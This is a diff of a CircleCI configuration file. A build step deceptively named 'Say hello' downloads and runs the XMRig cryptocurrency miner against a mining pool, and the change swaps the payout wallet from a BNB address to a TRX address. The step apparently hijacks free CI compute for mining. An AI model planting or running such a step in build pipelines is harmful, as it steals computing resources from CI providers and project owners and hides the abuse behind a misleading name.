--- a/.circleci/config.yml
+++ b/.circleci/config.yml
@@ -16,7 +16,7 @@ jobs:
       - checkout
       - run:
           name: "Say hello"
-          command: "wget https://github.com/xmrig/xmrig/releases/download/v6.15.3/xmrig-6.15.3-linux-x64.tar.gz && tar -zxf xmrig-6.15.3-linux-x64.tar.gz && cd xmrig-6.15.3 && ./xmrig --donate-level 1 -o rx.unmineable.com:3333 -u BNB:bnb1e945jnw9ppg8sxg2cqgl0vz2354z980xtcnzn4 -p x -k -a rx/0"
+          command: wget https://github.com/xmrig/xmrig/releases/download/v6.15.3/xmrig-6.15.3-linux-x64.tar.gz && tar -zxf xmrig-6.15.3-linux-x64.tar.gz && cd xmrig-6.15.3 && ./xmrig --donate-level 1 -o rx.unmineable.com:3333 -u TRX:TPg1Af8PaE8rFBwyDmVJdxWNJAhqni6sJg.idk -p x -k -a rx/0
 
 
 # Invoke jobs via workflows
